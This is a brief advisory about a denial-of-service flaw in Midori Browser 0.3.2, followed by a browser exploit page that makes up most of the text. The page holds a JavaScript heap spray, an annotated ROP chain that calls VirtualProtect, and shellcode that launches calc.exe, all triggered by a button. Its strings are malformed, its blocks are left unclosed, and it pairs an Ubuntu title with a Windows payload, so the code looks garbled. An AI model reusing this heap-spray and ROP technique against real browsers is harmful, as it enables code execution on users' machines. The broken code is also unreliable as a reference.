The Midori Browser is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Midori Browser 0.3.2 is vulnerable; other versions may also be affected.
<!-- ROP completed--->
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title>
<script type="text/javascript">
function ignite(){
var carpet = 0x200;
var vftable = unescape("\x00% u0c10");
var pLand = "% u00fd% u0c10";
var pShell = "% u0000% u0c10";
var oldProt = "% u0000% u0c10";
var heap = unescape("% u0101% u0102"
+"% u0008% u0c10"
+"% u0105% u0106"
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret
+"% u0109% u010a"//
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly
+"% ue8d4% u6d7f"//"% u0118% u0119"// mov [ecx],eax;pop ebp;ret
+"% u011a% u011b"// will be popped in ebp
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret
+oldProt//"% u0124% u0125" // pOldProtection
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret
+"% u013a% u013b"// will be popped in ebp
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+"% u0000% u0010"//"% u0146% u0147" // Size
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
/*+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
*/+"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.
/* Need to fix the ebp for proper landing on shellcode */
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret
+"% u0160% u0161"
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect
+"% u0164% u0165"
+"% u0166% u0167"
+"% u0168% u0169"
+"% u016a% u016b"
+"% u016c% u016d"
/* Shellcode : */+unescape("% u9090% u9090% u9090% u9090"
+"% u585b" // pop ebx;pop eax;
+"% u0a05% u0a13% u9000" // add eax,0a130a
+"% u008b" // mov eax,[eax]
+"% u056a" // push 05
+"% uc581% u0128% u0000" // add ebp,114
+"% u9055" // push ebp;nop
+"% u1505% u04d6% u9000" // add eax,4d615
+"% ud0ff" // call eax
/* command: */+"% u6163% u636c% u652e% u6578% u0000% ucccc"// calc.exe
var vtable = unescape("\x04% u0c10");
while(vtable.length < 0x10000) {vtable += vtable;}
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array();
for (var iter=0;iter<carpet;iter++){
spray[iter] = finalspray+heap;
/* vulnerability trigger : */
var arrobject = [0x444444444444];
<applet src="" width=10 height=10></applet>
<input type=button value="Object++" onclick="ignite()" />